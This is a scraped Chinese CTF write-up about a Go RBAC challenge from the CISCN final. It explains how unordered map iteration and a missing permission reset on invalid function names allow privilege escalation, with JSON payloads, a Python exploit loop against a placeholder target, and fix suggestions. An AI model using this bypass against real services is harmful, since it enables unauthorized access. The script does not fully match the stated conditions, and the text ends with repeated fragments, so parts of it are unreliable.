CISCN决赛AWDP RBAC题目分析与利用教学<\/h1>

题目概述<\/h2>
这是一个来自第十八届CISCN决赛第二日AWDP的Go语言题目，涉及基于角色的访问控制(RBAC)系统的漏洞利用。题目环境可在玄机平台复现(https:\/\/xj.edisec.net\/challenges\/169)。<\/p>

目标<\/h2>

获取flag需要满足以下条件：<\/p>

file:read<\/code>权限为1<\/li>
file:return<\/code>权限为1<\/li>
flag:return<\/code>权限为1<\/li>

请求参数中包含"flag"字符<\/li>
<\/ul>
源码分析<\/h2>
主要路由<\/h3>

getCurrentRBAC<\/code> - 查看当前用户权限<\/li>
execSysFunc<\/code> - 执行功能<\/li>
<\/ol>
核心数据结构<\/h3>

RBACList<\/code>: map类型，存储权限情况，键为string类型，值为int类型

格式为类型:权限<\/code>作为键，1为值<\/li>
<\/ul>
<\/li>
<\/ul>
execSysFunc处理流程<\/h3>

解析请求的JSON绑定到ExecStruct<\/code>结构体<\/li>
不会直接修改RBACList<\/code>，而是通过处理RBACToGrant<\/code>进行权限管理<\/li>
检查JSON中的Directory<\/code>、Flag<\/code>、Pwd<\/code>、File<\/code>字段<\/li>
将这些字段添加到RBACToGrant<\/code>，以类型:权限<\/code>为键，1为值存放<\/li>
最后通过updateRBAC<\/code>更新RBACList<\/code><\/li>
<\/ol>
关键漏洞点<\/h3>


map无序性利用<\/strong>：<\/p>

Go语言的map是无序的，遍历RBACToGrant<\/code>时顺序不确定<\/li>
当JSON中有"file":["return"]<\/code>时，会添加三个值到RBACToGrant<\/code><\/li>
由于map无序，可能在updateRBAC<\/code>中先处理flag:return<\/code>而非file:return<\/code><\/li>
<\/ul>
<\/li>

权限持久化漏洞<\/strong>：<\/p>

正常情况下，每次请求后会执行initRBAC()<\/code>初始化权限<\/li>
但当输入错误的函数名时，返回400错误且不执行<\/strong>initRBAC()<\/code><\/li>
导致上一次修改的权限可以保留下来<\/li>
<\/ul>
<\/li>
<\/ol>
利用步骤<\/h2>
第一步：获取file:return权限<\/h3>
发送包含"file":["return"]<\/code>的请求：<\/p>
{
<\/span><\/span>    "file"<\/span>: ["return"<\/span>]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>检查响应，确认file:return<\/code>变为1。<\/p>
第二步：利用错误函数名保持权限<\/h3>
发送包含错误函数名的请求，使系统不重置权限：<\/p>
{
<\/span><\/span>    "file"<\/span>: ["return"<\/span>],
<\/span><\/span>    "Function"<\/span>: "invalid_function_name"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第三步：重复请求直到flag:return为1<\/h3>
由于map无序性，重复发送上述请求，直到flag:return<\/code>也变为1。<\/p>
第四步：正常读取flag<\/h3>
当file:return<\/code>和flag:return<\/code>都为1时，发送正常读取flag的请求。<\/p>
Python利用脚本示例<\/h2>
import<\/span> requests
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target_url\/execSysFunc"<\/span>
<\/span><\/span>
<\/span><\/span># 第一步：获取file:return权限<\/span>
<\/span><\/span>payload1 =<\/span> {
<\/span><\/span>    "file"<\/span>: ["return"<\/span>]
<\/span><\/span>}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, json=<\/span>payload1)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span>
<\/span><\/span># 第二步和第三步：利用错误函数名保持权限并尝试获取flag:return<\/span>
<\/span><\/span>payload2 =<\/span> {
<\/span><\/span>    "file"<\/span>: ["return"<\/span>],
<\/span><\/span>    "Function"<\/span>: "invalid_function_name"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(10<\/span>):  # 尝试多次<\/span>
<\/span><\/span>    response =<\/span> requests.<\/span>post(url, json=<\/span>payload2)
<\/span><\/span>    print(f<\/span>"Attempt <\/span>{<\/span>i+<\/span>1<\/span>}<\/span>:"<\/span>, response.<\/span>text)
<\/span><\/span>    
<\/span><\/span>    # 检查当前权限<\/span>
<\/span><\/span>    rbac_response =<\/span> requests.<\/span>get("http:\/\/target_url\/getCurrentRBAC"<\/span>)
<\/span><\/span>    print("Current RBAC:"<\/span>, rbac_response.<\/span>text)
<\/span><\/span>    
<\/span><\/span>    # 如果flag:return已经是1，可以尝试读取flag<\/span>
<\/span><\/span>    if<\/span> '"flag:return":1'<\/span> in<\/span> rbac_response.<\/span>text:
<\/span><\/span>        break<\/span>
<\/span><\/span>
<\/span><\/span># 第四步：读取flag<\/span>
<\/span><\/span>payload3 =<\/span> {
<\/span><\/span>    "flag"<\/span>: ["read"<\/span>],
<\/span><\/span>    "param"<\/span>: "flag"<\/span>
<\/span><\/span>}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, json=<\/span>payload3)
<\/span><\/span>print("Flag:"<\/span>, response.<\/span>text)
<\/span><\/span><\/code><\/pre>修复建议<\/h2>

强制初始化<\/strong>：在返回400错误时也执行initRBAC()<\/code>初始化权限<\/li>
权限分离<\/strong>：将flag和file的return权限完全分离，避免交叉影响<\/li>
有序数据结构<\/strong>：使用有序数据结构替代map，确保权限更新顺序可控<\/li>
输入验证<\/strong>：严格验证函数名，避免通过错误函数名绕过权限重置<\/li>
<\/ol>

CISCN决赛AWDP RBAC题目分析与利用教学<\/h1>

题目概述<\/h2> 这是一个来自第十八届CISCN决赛第二日AWDP的Go语言题目，涉及基于角色的访问控制(RBAC)系统的漏洞利用。题目环境可在玄机平台复现(https:\/\/xj.edisec.net\/challenges\/169)。<\/p>

源码分析<\/h2>

利用步骤<\/h2>

第三步：重复请求直到flag:return为1<\/h3> 由于map无序性，重复发送上述请求，直到flag:return<\/code>也变为1。<\/p>

题目概述<\/h2>
这是一个来自第十八届CISCN决赛第二日AWDP的Go语言题目，涉及基于角色的访问控制(RBAC)系统的漏洞利用。题目环境可在玄机平台复现(https:\/\/xj.edisec.net\/challenges\/169)。<\/p>

第三步：重复请求直到flag:return为1<\/h3>
由于map无序性，重复发送上述请求，直到`flag:return<\/code>也变为1。<\/p>`